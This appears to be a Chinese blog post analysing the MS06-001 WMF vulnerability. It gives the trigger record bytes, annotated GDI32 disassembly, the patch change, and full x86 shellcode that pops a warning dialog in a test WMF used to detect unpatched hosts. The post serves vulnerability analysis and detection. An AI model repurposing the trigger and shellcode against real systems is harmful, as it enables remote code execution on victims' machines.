MS06001 图形呈现引擎(WMF)漏洞分析学习手记

最新推荐文章于 2024-06-21 09:37:53 发布
最新推荐文章于 2024-06-21 09:37:53 发布
阅读量912 收藏 1
点赞数
分类专栏: 个人随想 文章标签: 图形 引擎 byte c windows 测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/flycock/article/details/596771
版权
MS06001 图形呈现引擎(WMF)漏洞分析学习手记



killer<2>xfocus.org


    图形呈现引擎中由于其处理 Windows 图元文件 (WMF) 图像的方式而存在一个远程执行代码漏洞。据FlashSky所言是MS早期在处理OLE而在WMF(没有考虑安全)中定义的功能。漏洞因0day方式传播而导致漏洞被曝光。Win2000、XPsp1、XPsp2代码略有不同,如下代码是XPsp1的。


一、漏洞分析:

    漏洞出现的问题是在PlayMetaFile函数中,函数调用关系如下:
    
    Gdi32.dll!PlayMetaFile
                PlayMetaFileRecord
                   Escape
                     SetAbortProc

    在PlayMetaFileRecord函数中将比较wmf格式中的相关Record结构,如果该标记不为0X49和后续的标记不为0X0f则转向跳到ESCAPE函数上,ESCAPE会允许设置为wmf一个段当作代码,并将这个地址传送给sETaBORTpROC,在sETaBORTpROC函数返回的时候,WMF文件中的代码将会被执行。
    在WMF文件头中增加如下Record可以激活漏洞:11 00 00 00 26 06 09 00 16 00


.TEXT:77c4b65c           PUSH  [EBP+UfLAGS]            ; CASE 0X26
.TEXT:77c4b65f           PUSH  EBX
.TEXT:77c4b660           CALL  _pLAYiNTOamETAFILE@8    ; pLAYiNTOamETAFILE(X,X)
.TEXT:77c4b665           CMP   EAX, EDI
.TEXT:77c4b667           MOV   [EBP+VAR_4], EAX
.TEXT:77c4b66a           JNZ   LOC_77c4b424
.TEXT:77c4b670           MOV   AX, [EBX+6]        ;AX=09=sETaBORTpROC
.TEXT:77c4b674           CMP   AX, 0fH
.TEXT:77c4b678           JNZ   LOC_77c5fc0a
...
.TEXT:77c61062           SUB   EDI, 6            ;将9进行减去三次,如果在减6为0
.TEXT:77c61065           JZ    SHORT LOC_77c61090    ;则跳到sETaBORTpROC函数
...
.TEXT:77c61090           PUSH  [EBP+ARG_c]             ; abortproc
.TEXT:77c61093           PUSH  [EBP+ARG_0]             ; hdc
.TEXT:77c61096           CALL  _sETaBORTpROC@8         ; sETaBORTpROC函数将返回1
...
.TEXT:77c604c8           MOV   EAX, [EAX+14H]        ;代码地址传入eax
.TEXT:77c604cb           CMP   EAX, ECX            ;如果该地址为空跳走
.TEXT:77c604cd           JZ    LOC_77c4b286
.TEXT:77c604d3           PUSH  ECX
.TEXT:77c604d4           PUSH  EDI
.TEXT:77c604d5           CALL  EAX            ;执行wmf文件中的代码!
.TEXT:77c604d7           TEST  EAX, EAX
.TEXT:77c604d9           JZ    LOC_77c5c87b
.TEXT:77c604df           JMP   LOC_77c4b286



补丁改动:

    MS修补这个漏洞采用直接比较是否为0x09,如果是则不走入Escape函数,直接返回。

7F032200    837C24 04 09          CMP DWORD PTR SS:[ESP+4],9   ;直接比较标记是否为09
7F032205    74 08                 JE SHORT GDI32.7F03220F
7F032207    837C24 04 0F          CMP DWORD PTR SS:[ESP+4],0F
7F03220C    74 01                 JE SHORT GDI32.7F03220F
7F03220E    40                    INC EAX
7F03220F    C2 0400               RETN 4



二、检测Shellcode:

    为检测主机是否存在漏洞,构造了一个WMF文件,发现现有的ShellCode无不是为了入侵(add user&downexec),流传的那个0day会崩掉Explorer.exe,于是自己写了一个简易弹出提醒对话框的Shellcode,代码如下:

    __asm
    {
        pushad
        sub esp, 100;
        mov ebp,esp;
        mov eax,fs:0x30    
        mov eax,[eax+0x0c]
        mov esi,[eax+0x1c]
        lodsd                
        mov edi,[eax+0x08]
        mov eax, [edi+3Ch]
        mov edx,[edi+eax+78h]
        add edx,edi                
        mov ecx,[edx+18h]
            mov ebx,[edx+20h]                
        add ebx,edi                                
sa:
        dec ecx
        mov esi,[ebx+ecx*4]                
        add esi,edi    
        mov eax,0x50746547
        cmp [esi],    eax
        jne sa
        mov eax,0x41636f72
        cmp [esi+4],eax
        jne sa                
            mov ebx,[edx+24h]
        add ebx,edi
        mov cx,[ebx+ecx*2]
            mov ebx,[edx+1Ch]
        add ebx,edi
        mov eax,[ebx+ecx*4]            
        add eax,edi            
        mov [ebp+76], eax            
        push 0x0
        push dword ptr 0x41797261
        push dword ptr 0x7262694c
        push dword ptr 0x64616f4c
        push esp
        push edi                    
        call [ebp+76]
        mov [ebp+80],  eax
        push dword ptr 0x00003233
        push dword ptr 0x72657375
        push esp
        call [ebp+80]    ;LoadLibraryA
        mov edi,eax
        push dword ptr 0x0041786F
        push dword ptr 0x42656761
        push dword ptr 0x7373654D
        push esp
        push edi                    
        call [ebp+76]
        mov [ebp+84],  eax
        mov byte PTR [ebp-41h],00h
        mov byte PTR [ebp-40h],00h
        lea esi,[ebp-41h]
        mov byte PTR [ebp-19h],46h
        mov byte PTR [ebp-18h],6fh
        mov byte PTR [ebp-17h],75h
        mov byte PTR [ebp-16h],6eh
        mov byte PTR [ebp-15h],64h
        mov byte PTR [ebp-14h],20h
        mov byte PTR [ebp-13h],57h
        mov byte PTR [ebp-12h],4dh
        mov byte PTR [ebp-11h],46h
        mov byte PTR [ebp-10h],20h
        mov byte PTR [ebp-0fh],76h
        mov byte PTR [ebp-0eh],75h
        mov byte PTR [ebp-0dh],6ch
        mov byte PTR [ebp-0ch],6eh
        mov byte PTR [ebp-0bh],75h
        mov byte PTR [ebp-0ah],72h
        mov byte PTR [ebp-09h],61h
        mov byte PTR [ebp-08h],62h
        mov byte PTR [ebp-07h],69h
        mov byte PTR [ebp-06h],6ch
        mov byte PTR [ebp-05h],69h
        mov byte PTR [ebp-04h],74h
        mov byte PTR [ebp-03h],79h
        mov byte PTR [ebp-02h],21h
        mov byte PTR [ebp-01h],00h
        lea edi,[ebp-19h]
        push 0x30
        push esi
        push edi
        push 0
        call [ebp+84]
        add esp,136
        popad
        retn
    }

    利用这个Shellcode构造了一个测试的wmf文件(320字节),有漏洞主机预览此附件会弹出发现风险的提示窗口。



感谢: Sowhat、FlashSky、tombkeeper,没有你们的指点便没有这篇文章。
flycock
关注
专栏目录
C#实现位图转化为WMF (附完整源码)
希望我的博客,能帮上你解决学习中工作中所遇到的问题
07-01 40
C#实现位图转化为WMF (附完整源码)
MS08-052 WMF漏洞分析漏洞测试
|独自望海。。。
10-03 693
 ------by CuteK一 背景知识由文件格式入手,来分析MS08-052漏洞, 并构造了一个可以使没有补丁的程序崩溃的图片,1 WMF文件结构--------------------------|| 文件头 ||-------------------------|| 文件记录 ||-------------------------||-------------------------||
WMF漏洞被疯狂利用 “QQ尾巴”借机传播(转)
cuankuangzhong6373的博客
07-02 193
金山毒霸反病毒监测中心消息,目前已经有数以千计的木马、广告软件、病毒利用微软操作系统WMFWindows图元文件)安全漏洞进行传播。金山反病毒专家介绍,病毒作者通常将含有此漏洞WMF恶意文件注入到将要攻击的网站中,在用户系统...
关于微软WMF 漏洞的 紧急通报 只要你一看图片就会中木马
FreeXploiT
12-30 2061
先说说这个s b漏洞的危害只要你一看图片就会中木马原文发至幻影旅团 http://www.ph4nt0m.org/bbs/showthread.php?s=&postid=65399#post65399cmd下执行 regsvr32.exe /u shimgvw.dll执行以上命令则可禁止wmf执行,regsvr32.exe一般在system32下,没有的话自己去搜envymask刺这个方法只能防
WMF漏洞是微软故意设置的后门吗?
01-17 1539
Subject: Re: You wont want to miss tonights Security Now!, #22 Date: Thu, 12 Jan 2006 18:46:56 -0800
C++资源大全之游戏引擎图形用户界面
08-29
C++ 游戏引擎图形用户界面资源大全 本资源大全涵盖了 C++ 游戏引擎图形用户界面的各个方面,包括游戏引擎图形用户界面库、图形渲染引擎、图像处理库等。 游戏引擎 游戏引擎是游戏开发的核心组件之一,负责...
Microsoft Windows图形渲染引擎WMF格式解码内存越界漏洞
生命的守望
01-13 1146
漏洞名称:Microsoft Windows图形渲染引擎WMF格式解码内存越界漏洞发现者:cocoruder(frankruder_at_hotmail.com) http://ruder.cdut.net类型:设计错误最后更新时间:07/01/2006受威胁的系统:    Microsoft Windows XP SP2    Microsoft Windows XP SP1    Micros
wmf.zip_wmf
09-19
WMF是一种图形文件格式,最初由微软在1990年代为Windows操作系统设计,用于存储矢量图形和位图图像。这个压缩包可能包含了与WMF文件格式相关的电子元件的图形表示或者设计资料。 描述中提到“this consists of ...
wmf转svgz、png
02-22
1. WMF格式:WMF是一种基于矢量图形的微软格式,主要用于存储图形和图像。这种格式在Windows系统中广泛使用,支持复杂的图形操作,如曲线、形状和文字。然而,WMF文件不跨平台兼容,且文件大小相对较大,不适合网络...
wmf格式开发资料最新Windows Metafile Format- v20170601
09-01
wmf格式开发资料最新Windows Metafile Format,This is a specification of the Windows metafile format (WMF) structure, which can store an image in portable form. The stored image can be rendered by parsing and processing the metafile.
flashsky我的安全之路
02-07
著名计算机安全专家flashsky讲述自己的奋斗经历。
SPL气压计芯片手册
11-15
英飞凌SPL06-001手册,便于开发市场上价格比BMP280和MS5611都便宜
中国传奇黑客一览表
qq_69775412的博客
10-14 4445
1994年前后,国内出现了最早一批黑客,其中以龚蔚、天山等顶级黑客为代表;2000年左右,第二代黑客出现,他们的技术特点与前辈相仿,深入研究网络安全技术,有自己的理论和产品;而后第三代黑客的代表是“中国红客联盟”,他们在中美黑客大战中频频见诸媒体。 时至今日,三代成名的黑客众多,不胜枚举。接下来就盘点一下非科班出身的黑客大佬!这几个大佬不是科班出身,所学专业和计算机一点也不搭边,但是却成为了业内知名的黑客大佬!
Microsoft Windows远程桌面协议中间人攻击漏洞(CVE-2005-1794)解决方案
热门推荐
安全小白的博客
06-12 4万+
Microsoft Windows远程桌面协议中间人攻击漏洞(CVE-2005-1794)解决方案1.系统版本:windows server 2003 2.漏洞:CVE-2005-1794 3.修复方案: 漏洞介绍: Microsoft Windows远程桌面协议用于连接Windows终端服务。 Windows远程桌面协议客户端没有验证会话的服务器公共密钥,远程攻击者可以利用这个漏洞通过Man
在网络安全领域,比较牛的中国黑客有哪些?
最新发布
2402_84205067的博客
06-21 1261
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
--------溢出植入型木马(后门)的原型实现 作者:FLASHSKY(原创)
FreeXploiT
11-26 2209
 作者:FLASHSKY(原创)作者邮箱:flashsky@xfocus.org站点:    www.xfocus.net申明: 作者无意实现一个木马,作者也不是一个木马开发者,只是提供一种思路:将缓冲区溢出攻击和木马/后门相结合的木马实现手段,通过一个简单的原型来验证这种思路的可行性,并展示给大家看到这种实现方式的很多特点和优势。也提请安全研究人员对这种木马发展技术给予较高的关注,提出查杀和避免
对flashsky印象最深的一段话
生命的守望
10-11 1238
当侠义的精神已经消失,盖世的武功也只能成为逞强斗狠,凌辱他人的工具,在只有名与利的江湖里,侠客早已消失。当追求技术完美与精神的自由的黑客精神,在喧嚣的红尘里迷失,而黑客技术只沦落为恶意入侵和获取非法利益的手段的时候,世上也就没有真正的黑客了。江湖变了,人也老了,曾经的叛逆的那些攻击技术研究的黑客先驱已不能再回首,行业的发展也使得攻击技术的研究终于能光明正大的立足于安全研究领域的时候,或许是应该让我
2018-2019-2 《网络对抗技术》Exp5 msf 20165222
weixin_30606461的博客
04-20 154
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 总计:主动:ms17_010永恒之蓝(成功); 浏览器:office_word_hta(成功); 客户端:ms10_046_shortcut_icon_dllloader(成功); ms15_020_shortcut_icon_dllloader(成功); 辅助模块:browser_inf...
修复Win7预览WMF/EMF图片漏洞,EMFPlugIn教程指南
WMF和EMF是微软推出的矢量图形格式,广泛用于Windows操作系统中的图形渲染。然而,由于这些格式的解析存在漏洞,攻击者可以构造恶意的WMF/EMF文件,利用漏洞执行任意代码,从而安装间谍软件、木马等恶意软件,甚至...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值